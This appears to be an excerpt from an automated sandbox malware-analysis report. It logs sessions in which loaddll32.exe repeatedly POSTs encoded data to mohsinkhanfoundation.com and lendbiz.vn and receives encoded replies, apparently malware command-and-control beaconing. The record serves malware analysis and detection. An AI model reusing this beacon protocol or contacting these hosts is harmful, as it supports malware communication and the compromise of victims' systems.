                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          40192.168.2.749826107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:17.065156937 CEST1641OUTPOST /pcQLeLMbur/fBM5IDlCe3J+YXp8c2J9ZX0= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:17.462534904 CEST1643INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:17 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          41192.168.2.749828107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:18.445357084 CEST1651OUTPOST /pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:18.880369902 CEST1652INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:18 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          42192.168.2.749830107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:20.231148005 CEST1661OUTPOST /pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:20.649101019 CEST1662INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:20 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          43192.168.2.749832107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:20.891990900 CEST1671OUTPOST /pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:21.332444906 CEST1672INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:20 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          44192.168.2.749834107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:21.585212946 CEST1680OUTPOST /pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:22.027040958 CEST1682INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:21 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          45192.168.2.749836107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:22.285861969 CEST1684OUTPOST /pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:22.728055954 CEST1691INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:22 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          46192.168.2.749837107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:23.062314987 CEST1692OUTPOST /pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:23.500766039 CEST1694INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:23 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzf0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          47192.168.2.749839107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:23.744116068 CEST1702OUTPOST /pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:24.136245012 CEST1703INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:23 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzeEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          48192.168.2.749842103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:24.987550020 CEST1712OUTPOST /xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:25.857264042 CEST1721INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:22 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:22 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
